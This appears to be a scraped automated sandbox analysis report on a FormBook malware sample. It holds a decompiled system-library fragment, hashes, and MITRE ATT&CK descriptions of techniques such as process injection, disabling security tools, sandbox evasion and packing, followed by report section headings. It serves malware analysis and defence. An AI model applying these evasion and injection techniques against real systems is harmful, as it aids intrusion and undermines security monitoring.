				_t7 = E04AFCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04B45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04B45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04b4fdda
0x04b4fde2
0x04b4fde5
0x04b4fdec
0x04b4fdfa
0x04b4fdff
0x04b4fe0a
0x04b4fe0f
0x04b4fe17
0x04b4fe1e
0x04b4fe19
0x04b4fe19
0x04b4fe19
0x04b4fe20
0x04b4fe21
0x04b4fe22
0x04b4fe25
0x04b4fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B4FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B4FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B4FE2B

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: b6d720ebef794497bf322630dc1d992233c80bfb8b78eee0ab7cbc7e3b8866dd
Instruction ID: a404575e377019dc123cdb15148655328e96126624d7e59c5e66188a7b277173
Opcode Fuzzy Hash: b6d720ebef794497bf322630dc1d992233c80bfb8b78eee0ab7cbc7e3b8866dd
Instruction Fuzzy Hash: 22F0F632240601BFE6201A45DC02F33BB5AEB84730F140354F728565D1EA62F930A6F5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report JFBlvEr5H9

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

Function 004182AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
filenativeCOMMON

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 0041838B, Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON